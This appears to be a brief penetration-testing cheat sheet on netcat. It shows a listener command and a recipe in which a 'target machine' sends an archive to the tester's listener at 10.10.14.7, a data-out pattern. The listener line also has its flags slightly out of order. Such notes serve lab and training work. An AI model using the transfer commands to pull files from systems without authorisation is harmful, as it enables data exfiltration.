Skip to content

Netcat

Netcat is a simple Unix utility which reads and writes data across network connections, using the TCP/IP protocol.

Listen on a port

nc -lvpn 4444

Transfer files

On your machine:

nc -lvnp 1337 > backup.tar.gz

On the target machine:

nc 10.10.14.7 1337 < backup.tar.gz